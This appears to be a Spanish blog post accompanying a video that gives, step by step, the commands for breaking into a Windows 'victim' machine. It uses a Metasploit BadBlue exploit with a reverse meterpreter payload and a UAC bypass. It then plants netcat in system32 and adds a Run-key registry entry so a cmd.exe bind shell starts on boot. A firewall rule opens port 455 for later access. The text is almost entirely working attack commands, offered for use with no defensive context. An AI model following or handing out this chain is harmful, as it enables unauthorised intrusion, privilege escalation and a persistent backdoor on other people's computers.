Como en el vídeo lo demuestra dejare a continuación los comando que se utilizaran en el vídeo.
Abrimos la consola de metasploit con el comando msfconsole
Y utilizamos el siguiente modulo
use exploit/windows/http/badblue_passthru
Ingresamos el payload
set payload windows/meterpreter/reverse_tcpConfiguramos los parámetros requeridos con el rhost y el lhost y ejecutamos con exploit. Luego cuando ya tengamos nuestra sesión de meterpreter abierta. Damos con el comando background para guardar nuestra sesion ya que tendremos que utilizar un modulo de bypassuac para obtener nuestros privilegios como administrador en el sistema de la victima.
use exploit/windows/local/bypassuacY completamos los parámetros en este caso solo nos solicitara la sesión que teníamos guardado anteriormente. Con el comando set session 1 (Numero de la sesion guardada). Y le damos exploit.
Ahora vamos vamos a subir nuestro netcat a la maquina de la victima, vamos a hacerlo en la carpeta system32 el cual nos permitirá llamar en programa de cualquier ruta del sistema. Digitamos en la terminal el comando execute -f cmd -i para llamar la shel de windows. Y luego con el comando
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32Luego de realizar la subida de netcat, ahora vamos a modificar los registros de windows para que nuestro programa se ejecute al iniciar la maquina de la victima.
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe .Ldp 455 -e cmd.exe'Y con el siguiente comando verificamos si todo esta de forma correcta
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v ncAhora para finalizar debemos abrir los puertos de la maquina de la victima con el siguiente comando.
netsh advfirewall firewall add rule name="el nombre del programa" dir=in action=allow protocol=tcp localport=455
Luego de que la maquina victima reinicie van a poder tener una shell con netcat con el siguiente comando.
nc -v (ip victima) 455
VÍDEO

0 Comentarios